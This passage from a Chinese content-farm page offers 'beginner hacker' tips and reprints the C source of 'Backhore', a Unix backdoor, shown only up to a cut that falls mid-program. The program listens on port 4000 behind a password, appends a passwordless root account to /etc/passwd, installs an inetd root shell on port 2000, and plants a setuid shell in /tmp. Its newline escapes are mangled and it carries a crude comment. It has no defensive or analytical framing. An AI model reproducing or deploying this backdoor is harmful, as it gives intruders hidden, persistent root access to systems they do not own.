江苏龙网

  1. 主页 > 生活百科 > >

初级黑客技巧,老系统用的后门技巧( 二 )

小知识


<++> backdoor/remoteback.c
/* Coders:
Theft
Help from:
Sector9, Halogen
Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle,halogen, 
Psionic, g0d, Psionic.
Groups: Ethical Mutiny Crew(EMC), Common Purpose hackers(CPH),
Global Hell(gH), Team Sploit, Hong Kong Danger Duo,
Tg0d, EHAP.
Usage:
Setup: 
# gcc -o backhore backhore.c # ./backdoor password & 
Run: 
Telnet to the host on port 4000. After connected you
Will not be prompted for a password, this way it is less
Obvious, just type the password and press enter, after this
You will be prompted for a command, pick 1-8.
Distributers:
Ethical Mutiny Crew
*/
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define PORT 4000
#define MAXDATASIZE 100
#define BACKLOG 10
#define SA struct sockaddr 
void handle(int);
int
main(int argc, char *argv[])
{
int sockfd, new_fd, sin_size, numbytes, cmd;
char ask[10]="Command: ";
char *bytes, *buf, pass[40];
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
printf("n Backhore BETA by Theftn");
printf(" 1: trojans rc.localn");
printf(" 2: sends a systemwide messagen");
printf(" 3: binds a root shell on port 2000n");
printf(" 4: creates suid sh in /tmpn");
printf(" 5: creates mutiny account uid 0 no passwdn");
printf(" 6: drops to suid shelln");
printf(" 7: information on backhoren");
printf(" 8: contactn");
if (argc != 2) {
fprintf(stderr,"Usage: %s passwordn", argv[0]);
exit(1);
}
strncpy(pass, argv[1], 40);
printf("..using password: %s..n", pass);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(PORT);
my_addr.sin_addr.s_addr = INADDR_ANY;
if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) {
perror("bind");
exit(1);
}
if (listen(sockfd, BACKLOG) == -1) {
perror("listen");
exit(1);
}
sin_size = sizeof(SA);
while(1) { /* main accept() loop */
if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) {
perror("accept");
continue;
}
if (!fork()) {
dup2(new_fd, 0);
dup2(new_fd, 1);
dup2(new_fd, 2);
fgets(buf, 40, stdin);
if (!strcmp(buf, pass)) {
printf("%s", ask);
cmd = getchar();
handle(cmd);
}
close(new_fd);
exit(0);
}
close(new_fd);
while(waitpid(-1,NULL,WNOHANG) > 0); /* rape the dying children */
}
}
void
handle(int cmd)
{
FILE *fd;
switch(cmd) {
case '1':
printf("nBackhore BETA by Theftn");
printf("theft@cyberspace.orgn");
printf("Trojaning rc.localn");
fd = fopen("/etc/passwd", "a+");
fprintf(fd, "mutiny::0:0:ethical mutiny crew:/root:/bin/sh");
fclose(fd);
printf("Trojan complete.n");
break;
case '2':
printf("nBackhore BETA by Theftn");
printf("theft@cyberspace.orgn");
printf("Sending systemwide message..n");
system("wall Box owned via the Ethical Mutiny Crew");
printf("Message sent.n");
break;
case '3':
printf("nBackhore BETA by Theftn");
printf("theft@cyberspace.orgn");
printf("nAdding inetd backdoor... (-p)n");
fd = fopen("/etc/services","a+");
fprintf(fd,"backdoort2000/tcptbackdoorn");
fd = fopen("/etc/inetd.conf","a+");
fprintf(fd,"backdoortstreamttcptnowaittroott/bin/sh -in");
execl("killall", "-HUP", "inetd", NULL);
printf("ndone.n");
printf("telnet to port 2000nn");
break;
case '4':
printf("nBackhore BETA by Theftn");
printf("theft@cyberspace.orgn");
printf("nAdding Suid Shell... (-s)n");
system("cp /bin/sh /tmp/.sh");
system("chmod 4700 /tmp/.sh");
system("chown root:root /tmp/.sh");
printf("nSuid shell added.n");
printf("execute /tmp/.shnn");
break;
case '5':
printf("nBackhore BETA by Theftn");


推荐阅读


上一篇:探析饮食 茶文化受佛教之影响

下一篇:计算机:防火墙的作用和特征